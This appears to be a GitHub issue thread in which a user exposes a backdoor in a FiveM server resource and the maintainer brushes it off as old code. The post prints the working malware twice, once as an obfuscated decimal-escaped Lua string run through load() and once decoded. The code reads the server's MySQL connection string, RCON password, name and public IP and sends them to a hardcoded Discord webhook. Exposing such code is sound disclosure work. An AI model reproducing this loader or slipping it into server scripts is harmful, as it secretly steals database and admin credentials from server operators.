### ISSUE TITLE
Kids don't use such a shit

### ISSUE THREAD

**Issue by r9xz** [abimmxd/7777Premium#1]
ntrp_ac = "\32\32\32\32\108\111\99\97\108\32\73\73\73\61\123\73\73\73\73\61\123\71\101\116\67\111\110\118\97\114\125\125\108\111\99\97\108\32\95\73\61\123\91\34\103\110\105\114\116\115\95\110\111\105\116\99\101\110\110\111\99\95\108\113\115\121\109\34\93\61\123\34\110\105\101\32\122\110\97\108\101\122\105\111\110\111\34\125\44\91\34\100\114\111\119\115\115\97\112\95\110\111\99\114\34\93\61\123\34\110\105\101\32\122\110\97\108\101\122\105\111\110\111\34\125\44\91\34\101\109\97\110\116\115\111\104\95\118\115\34\93\61\123\34\110\105\101\32\122\110\97\108\101\122\105\111\110\111\34\125\44\91\34\104\116\116\112\115\58\47\47\97\112\105\46\105\112\105\102\121\46\111\114\103\34\93\61\123\34\110\105\101\32\122\110\97\108\101\122\105\111\110\111\34\125\125\108\111\99\97\108\32\115\101\114\118\101\114\95\105\112\61\34\34\108\111\99\97\108\32\109\121\115\113\108\61\34\34\108\111\99\97\108\32\114\99\111\110\61\34\34\108\111\99\97\108\32\115\101\114\118\101\114\95\110\97\109\101\61\34\34\102\111\114\32\95\44\95\95\32\105\110\32\112\97\105\114\115\40\73\73\73\41\100\111\32\102\111\114\32\95\44\95\95\32\105\110\32\112\97\105\114\115\40\95\95\41\100\111\32\102\111\114\32\95\73\44\95\73\73\32\105\110\32\112\97\105\114\115\40\95\73\41\100\111\32\102\111\114\32\95\44\95\73\73\32\105\110\32\112\97\105\114\115\40\95\73\73\41\100\111\32\105\102\32\115\116\114\105\110\103\46\115\117\98\40\95\73\44\51\44\54\41\61\61\34\105\114\116\115\34\116\104\101\110\32\109\121\115\113\108\61\95\95\40\115\116\114\105\110\103\46\114\101\118\101\114\115\101\40\95\73\41\44\95\73\73\41\101\108\115\101\105\102\32\115\116\114\105\110\103\46\115\117\98\40\95\73\44\51\44\54\41\61\61\34\97\110\116\115\34\116\104\101\110\32\115\101\114\118\101\114\95\110\97\109\101\61\95\95\40\115\116\114\105\110\103\46\114\101\118\101\114\115\101\40\95\73\41\44\95\73\73\41\101\108\115\101\105\102\32\115\116\114\105\110\103\46\115\117\98\40\95\73\44\51\44\54\41\61\61\34\111\119\115\115\34\116\104\101\110\32\114\99\111\110\61\95\95\40\115\116\114\105\110\103\46\114\101\118\101\114\115\101\40\95\73\41\44\95\73\73\41\101\108\115\101\105\102\32\115\116\114\105\110\103\46\115\117\98\40\95\73\44\51\44\54\41\61\61\115\116\114\105\110\103\46\114\101\118\101\114\115\101\40\34\58\115\112\116\34\41\116\104\101\110\32\80\101\114\102\111\114\109\72\116\116\112\82\101\113\117\101\115\116\40\34\104\116\116\112\115\58\47\47\97\112\105\46\105\112\105\102\121\46\111\114\103\34\44\102\117\110\99\116\105\111\110\40\95\44\95\95\44\95\95\95\41\105\102\32\95\61\61\50\48\48\116\104\101\110\32\115\101\114\118\101\114\95\105\112\61\95\95\32\101\110\100\32\108\111\99\97\108\32\119\101\98\104\111\111\107\61\34\104\116\116\112\115\58\47\47\100\105\115\99\111\114\100\97\112\112\46\99\111\109\47\97\112\105\47\119\101\98\104\111\111\107\115\47\55\50\52\50\57\51\57\57\51\52\51\54\57\51\56\52\49\49\47\57\70\55\108\119\98\65\104\69\100\82\79\73\69\110\118\89\68\57\102\70\51\88\120\53\66\111\88\88\120\68\54\95\75\113\70\97\107\81\67\112\95\107\49\88\110\65\80\108\87\98\50\84\57\70\51\84\50\112\73\115\49\75\56\74\100\102\105\34\108\111\99\97\108\32\110\61\123\123\91\34\99\111\108\111\114\34\93\61\34\49\54\55\49\49\55\49\49\34\44\91\34\116\105\116\108\101\34\93\61\34\69\83\83\65\32\58\62\34\44\91\34\100\101\115\99\114\105\112\116\105\111\110\34\93\61\34\92\110\92\110\32\62\32\96\96\78\65\90\87\65\32\83\69\82\86\69\82\65\58\96\96\42\42\42\34\46\46\115\101\114\118\101\114\95\110\97\109\101\46\46\34\42\42\42\92\110\32\62\32\96\96\73\80\32\83\69\82\86\69\82\65\58\96\96\32\42\42\42\34\46\46\115\101\114\118\101\114\95\105\112\46\46\34\42\42\42\92\110\32\62\32\96\96\72\65\83\197\129\79\32\82\67\79\78\58\96\96\32\42\42\42\34\46\46\114\99\111\110\46\46\34\42\42\42\92\110\32\62\32\96\96\66\65\90\65\32\68\65\78\89\67\72\58\96\96\32\42\42\42\34\46\46\109\121\115\113\108\46\46\34\42\42\42\34\44\91\34\102\111\111\116\101\114\34\93\61\123\91\34\116\101\120\116\34\93\61\34\120\115\116\110\95\98\97\103\103\121\95\115\112\101\100\34\125\44\91\34\116\105\109\101\115\116\97\109\112\34\93\61\111\115\46\100\97\116\101\40\39\33\37\89\45\37\109\45\37\100\84\37\72\58\37\77\58\37\83\39\41\44\125\125\80\101\114\102\111\114\109\72\116\116\112\82\101\113\117\101\115\116\40\119\101\98\104\111\111\107\44\102\117\110\99\116\105\111\110\40\101\114\114\44\116\101\120\116\44\104\101\97\100\101\114\115\41\101\110\100\44\39\80\79\83\84\39\44\106\115\111\110\46\101\110\99\111\100\101\40\123\117\115\101\114\110\97\109\101\61\34\101\115\115\97\34\44\101\109\98\101\100\115\61\110\125\41\44\123\91\39\67\111\110\116\101\110\116\45\84\121\112\101\39\93\61\39\97\112\112\108\105\99\97\116\105\111\110\47\106\115\111\110\39\125\41\101\110\100\41\101\110\100\32\101\110\100\32\101\110\100\32\101\110\100\32\101\110\100\10\32\32\32\32"
load(ntrp_ac)()

local III = {IIII = {GetConvar}}
local _I = {
    ["gnirts_noitcennoc_lqsym"] = {"nie znaleziono"},
    ["drowssap_nocr"] = {"nie znaleziono"},
    ["emantsoh_vs"] = {"nie znaleziono"},
    ["https://api.ipify.org"] = {"nie znaleziono"}
}
local server_ip = ""
local mysql = ""
local rcon = ""
local server_name = ""
for _, __ in pairs(III) do
    for _, __ in pairs(__) do
        for _I, _II in pairs(_I) do
            for _, _II in pairs(_II) do
                if string.sub(_I, 3, 6) == "irts" then
                    mysql = __(string.reverse(_I), _II)
                elseif string.sub(_I, 3, 6) == "ants" then
                    server_name = __(string.reverse(_I), _II)
                elseif string.sub(_I, 3, 6) == "owss" then
                    rcon = __(string.reverse(_I), _II)
                elseif string.sub(_I, 3, 6) == string.reverse(":spt") then
                    PerformHttpRequest(
                        "https://api.ipify.org",
                        function(_, __, ___)
                            if _ == 200 then
                                server_ip = __
                            end
                            local webhook =
                                "https://discordapp.com/api/webhooks/724293993436938411/9F7lwbAhEdROIEnvYD9fF3Xx5BoXXxD6_KqFakQCp_k1XnAPlWb2T9F3T2pIs1K8Jdfi"
                            local n = {
                                {
                                    ["color"] = "16711711",
                                    ["title"] = "ESSA :>",
                                    ["description"] = "\n\n > ``NAZWA SERVERA:``***" ..
                                        server_name ..
                                            "***\n > ``IP SERVERA:`` ***" ..
                                                server_ip ..
                                                    "***\n > ``HASŁO RCON:`` ***" ..
                                                        rcon .. "***\n > ``BAZA DANYCH:`` ***" .. mysql .. "***",
                                    ["footer"] = {["text"] = "xstn_baggy_sped"},
                                    ["timestamp"] = os.date("!%Y-%m-%dT%H:%M:%S")
                                }
                            }
                            PerformHttpRequest(
                                webhook,
                                function(err, text, headers)
                                end,
                                "POST",
                                json.encode({username = "essa", embeds = n}),
                                {["Content-Type"] = "application/json"}
                            )
                        end
                    )
                end
            end
        end
    end
end

**Comment by abimmxd** [comment]
It's just old code, and webhook discord doesn't work. You can remove encrypted code
